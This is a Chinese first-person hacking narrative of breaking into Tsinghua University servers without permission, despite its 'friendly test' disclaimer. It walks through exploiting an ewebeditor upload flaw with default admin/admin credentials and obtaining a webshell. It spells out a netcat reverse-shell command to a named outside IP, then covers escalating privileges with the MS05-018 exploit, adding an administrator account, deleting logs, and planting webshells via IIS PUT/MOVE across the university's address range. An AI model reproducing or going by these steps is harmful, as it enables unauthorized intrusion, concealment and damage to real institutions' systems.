本人此次纯属友情检测,没有对任何服务器造成伤害。文章涉及服务器已经全部打好补丁。请大家不要按图索骥,中国教育网络是脆弱的,请大家不要在给脆弱的心灵增加不必要的伤害 !
自上次偶利用ewebeditor存在的上传漏洞以及网站管理员的疏忽畅游了排名靠前的几所名牌大学后,在偶的心里留下了些许遗憾,就是中国排名前十的龙头老大清华没有进去过所以在那以后的日子里总想到这个全国最牛的高校去瞧瞧,再续我与中国名校的不解之缘。凑巧,五一到了,由于鄙人身无长物,一个人孤单的在校守着寝室,所以百无聊赖的我想借此良机免费检测一下清华大学。
一、 初探清华
五二了,一个人在寝室,天天不是逛坛子就是聊天,书怎么看不进去,无聊中想操家伙大干一场,目标是清华大学,像往常一样用明小子和阿D检测注入漏洞,在百度中输入inut:asp site:.tsinghua.edu.cn,几个页面下来还真找到不少注入点,进入了几个后台,有上传的地方,但是无论我以何种方式上传皆是滴水不进,折腾了整个下午,还是后台权限,郁闷极了,算了,我想被我们这样的小菜搞怕了,我还是另辟蹊径,毕竟是世界有名的大学,岂是一般善男信女。
二、 清华,未眠夜之第一晚
1、 曙光再现
五三了,还是没有进展,基本上不想搞了,想放弃了,想起我曾经在检测清华大学ewebeditor漏洞的时候发现她还是有不少的站点用到这个在线文本编辑器的,不过不是密码强悍就是改了数据库路径,貌似太多了我还没有检测完,好,我再继续,呵呵,耐心地找了N 页后终于让我找到一个可以成功进入ewebeditor后台的页面如图1,驾轻就熟拿下webshell如图2 。不要告诉我不知道怎么拿webshell,不要问我,看前几期的黑手去。
图1 (登录界面)
图2 (轻松拿下webshell)
仿佛一切来得太容易了,接下来是提权了,唉,累了,睡觉吧,不急,有的是时间晚上再搞,没有睡午觉还真累了。
2、 未眠夜
一觉醒来快晚上十点了,放了几天假,生活规律也乱了,慌乱的到学校的食堂吃点东西回来继续,打开我的webshell,收集一切有利于我提权的信息,先net user 发现有ASPNET用户,按照往常的惯例貌似支持解析aspx,可是我上传我的aspx木马,但是却不能解析,看来没有启动解析aspx的服务,netstat ?an 看到开了远程终端和pcanywhere
图3 
没有找到43958端口,net start中看到服务器是有mssql,pcanywhere, Terminal Services,如图4,只有这几个对我们的提权有帮助,整理一下思路,
A、 有MSSQL,可以找sa用户和密码,通过sqlrootkit提权
B、 破解pcanywhere密码,如果登录密码和pcanywhere相同,呵呵,那就太好了
C、 本地溢出
结果前面两种思路都失败了,第一种,我找遍这个web目录,里面几个站点的sql帐号密码都是一般权限,没有找到sa权限的用户和密码。第二种密码成功破解,可以连接但是还是进不了电脑,郁闷了,看来只有试一下本地溢出,直接加用户没有成功看来是guest权限,在webshell 中感觉很多命令不好使,用nc反向连接看看,上传nc , 在webshell的cmd命令中如入 D:\www-root\nerc\nc.exe -e c:\winnt\system32\cmd.exe 202.115.7.189 8081,如图5,在本地监听8081端口,命令为nc ?l ?p 8081,不久就有反应了,如图6,加用户是肯定不行的,如图7 ,看来要找本地溢出的exp,夜已经很深了,窗外寂静如斯,此时的我灵台清明,睡意全无,翻阅以前的网络安全杂志(不久以前在旧书市场以低价购得,没看过),寻找关于本地溢出的敏感信息,终于找到一个,windows CSRSS本地溢出漏洞,就是ms05018,呵呵来到放在职业欠钱空间里放的lcx空间下载了ms05018.exe,安焦编译的exp ,
武器找到了来到战场,上传运行如图8
图5
图六
图7
图8
哈哈,也许我运气好,也许是菜鸟必有天佑吧,我技术菜,运气再不好,我看就不要搞了,直接跳楼,我住在六楼,跳下去岂有命焉,不过幸运之神仿佛罩着我,每每在入侵低迷时候总给我以胜利的曙光,犹如神助,哈哈,成功添加了一个用户具有administrator权限的用户,成功登录 如图9 ,服务器里大小若二三十个院系站点。就这么拿下了,不过这样也花了我整整一个晚上,边看书便实践还真获益匪浅,清理一下战场,删除日志,退了出来,呵呵,看了看窗外,天边可以开始泛白,不知不觉中,天亮了,睡意也开始向我袭来,睡觉吧,人不是铁打的,身体要紧。 
图9 (成功登录)
3、 感触良多
Ewebeditor 在线文本编辑器上传漏洞出来这么久了,我写的那篇文章也出来一个多月了,网站管理人员还没有重视,在像清华这样名牌的大学漏洞重现,实非我等所愿,而且密码还是默认的admin/admin ,看来警报似乎没有敲响。对于这次安检鄙人获益良多,给我在以后的安检中积累了宝贵的经验。
三、 清华,未眠夜第二晚
1、iis写漏洞夜探清华
这几天似乎日夜颠倒了,昼伏夜行,简直成了黑蝙蝠,4号的晚上,白天网速慢,校园网就是这样到了晚上速度才有所改善,看了看时间,11点整,action,连接肉鸡,通过肉鸡登上昨天拿下的那台服务器,通过白天的查询知道166.111.0.0-166.111.255.255整个网段都是清华的,下载在iis写权限扫描工具里随意填上一个ip段,不久,就有收获了,如图10
图10
在iis写权限漏洞利用工具了填上有漏洞的ip,put含有你一句话木马的test.txt,点击提交数据包,如图11,然后在put的下拉菜单中点击move,最后提交数据包,就得到http://ip/shell.asp,这个就是你的一句话马了,再用客户端连接就ok了。具体步骤可以看网上教程,以前的黑手上也有相关文章,这里我就不再赘述了。
